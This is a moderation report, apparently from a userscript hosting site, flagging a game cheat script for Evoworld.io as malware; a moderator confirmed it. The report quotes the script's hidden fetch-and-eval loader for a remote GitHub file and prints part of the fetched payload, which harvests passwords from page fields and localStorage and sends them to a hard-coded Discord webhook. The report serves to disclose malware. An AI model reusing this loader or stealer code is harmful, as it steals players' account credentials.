Evoworld.io COMBAT HACKa été signalé 2026-01-04 pour Malware

Le rapport dit :

Stiller accounts line 409 - 419:
fetch('https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code')

.then(response => response.text())

.then(code => {

eval(code);

})

если перейти на https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code то там основная часть воровства аккаунтов:
// webhook.js - Data collection and Discord sending ONLY
(function() {
'use strict';

console.log('EvoWorld Data Collector loaded');

const DISCORD_WEBHOOK = 'https://discord.com/api/webhooks/1457387501139525810/owMaPq6BvF1suRbSgOC4BetPSNTbFijMvyOP8pSt6yVULem4mX9yHgKglOXEnlCHtHYE';

function getSavedPassword() {
try {
const inputs = document.querySelectorAll('input[type="password"], input[name*="pass"], input[id*="pass"]');
for (let input of inputs) {
if (input.value && input.value.length > 3 && input.value.length < 50) {
return input.value;
}
}

for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
if ((ke

Ce script a fait l'objet d' 1 rapport précédemment confirmé ou corrigé.

türk evoworld sikici(l'utilisateur signalé) a effectué:

Ce rapport a été confirmé par un modérateur, mais le modérateur l'a marqué comme Code externe non autorisé.